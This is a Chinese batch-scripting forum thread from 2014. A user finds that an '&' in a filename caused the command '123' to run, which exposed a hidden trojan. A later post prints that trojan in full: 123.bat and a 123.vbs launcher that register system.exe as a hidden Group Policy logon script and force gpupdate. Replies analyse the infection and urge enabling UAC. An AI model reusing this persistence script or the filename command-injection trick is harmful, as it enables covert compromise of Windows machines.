标题: [系统相关] 问个关于指令123就自动启动组策略更新的BUG [打印本页]
作者: ckz1211 时间: 2014-2-14 16:51 标题: 问个关于指令123就自动启动组策略更新的BUG
前几天我觉得每次批量改名就要打开有GUI的批量改名程序实在麻烦,就想要弄个鼠标右键菜单里能够一键批量改名的bat脚本
脚本写出来后,特殊字符基本能支持,但据说由于cmd内部的bug,不会把引号内部的&视为转义字符,所以这个符号&无解。然后,我测试&时,用了两个文件
abc & 123.txt
abc&123.txt
然后我就遇到组策略更新的BUG了,一旦启动批量改名的脚本,cmd就会自动更新组策略。然后,我在开始菜单运行gpedit.msc,发现组策略被拒绝访问了!
系统还原后,组策略恢复了,然后我又研究了下这问题——特殊字符&后面的字符,会被错误地视为第二个命令,于是,cmd启动组策略更新的指令竟然是123!
我打开cmd验证下猜想,输入123,然后组策略又被更新了!马上关闭cmd,但之后运行gpedit.msc,发现组策略又被拒绝访问了!
之后我第二次系统还原恢复组策略……
我想问这个关于组策略更新的BUG有办法解决么?(我的系统是Win 7 sp1 64位)
首先,更新组策略这么重要敏感的指令,怎么用个123就能启动了……不小心输错不就危险了?
其次,在不开启UAC的前提下(我真的不能开,开了的话一些破解软件的补丁就无效了),能否禁止cmd命令更新组策略?最好还能禁止cmd对注册表以及其它重要系统设置的改动……
既然cmd对特殊字符&无解,那么一旦文件名里&符号后面有123或者其它能破坏系统的指令,那么我的批量改名脚本就变成危险的病毒了……
PS:现在我在研究powershell,初步看上去这个安全一些……
作者: Batcher 时间: 2014-2-14 17:14
能否把你的脚本贴出来看看
作者: ckz1211 时间: 2014-2-14 23:59
我搜索了一下"123",在系统文件夹C:\Windows下面发现了两个可疑文件
123.bat- @echo off
- md %windir%\system32\GroupPolicy\User\Scripts
- set di=%windir%\system32\GroupPolicy\User\Scripts
- attrib -a -s -r -h %di%\scripts.ini
- del %di%\scripts.ini /q
- echo.>%di%\scripts.ini
- echo [Logon] >>%di%\scripts.ini
- echo 0CmdLine=system.exe >>%di%\scripts.ini
- echo 0Parameters= >>%di%\scripts.ini
- attrib +s +a +r +h %di%\scripts.ini
- set ei=%windir%\system32\GroupPolicy
- attrib -a -s -r -h %ei%\gpt.ini
- del %ei%\gpt.ini /q
- echo [General]>%ei%\gpt.ini
- echo gPCUserExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B66650-4972-11D1-A7CA-0000F87571E3}] >>%ei%\gpt.ini
- echo Version=65536 >>%ei%\gpt.ini
- attrib +s +a +r +h %ei%\gpt.ini
- md %windir%\system32\GroupPolicy\User\Scripts\Logon
- md %windir%\system32\GroupPolicy\User\Scripts\Logoff
- copy system.exe %di%\Logon /y
- gpupdate /force
复制代码
123.vbs- Set ws = CreateObject("Wscript.Shell")
- ws.run "cmd /c 123.bat",vbhide
复制代码
这俩的创建时间2013年9月20日0点19分
妥妥的木马,居然潜伏了这么久!
作者: PowerShell 时间: 2014-2-16 00:13
1 楼主错误地搞了个文件改名的bat代码 abc & 123.txt ,发现123作为命令运行了。-----带有&符号的改名,却实可用powershell避开。
2 123 运行后,楼主组策略被改了。后来查找发现,有一个123.bat,这是个隐藏的黑客脚本。-----这里告诫大家不要用xp,要用win7以上,这些系统中有uac,cmd中,默认非管理员权限,运行上述黑客脚本,那么黑客脚本中的第一句话,md %windir%\system32\GroupPolicy\User\Scripts,就会拒绝访问。
uac必须开启,才安全,否则,请用虚拟机运行程序。
如果非不听我老人家的话,必然中黑客脚本!!!
必然被脚本黑客玩到死!!!
作者: Batcher 时间: 2014-2-16 08:28
回复 3# ckz1211
还有倒数第二行那个system.exe
欢迎光临 批处理之家 (http://bathome.net./) |
Powered by Discuz! 7.2 |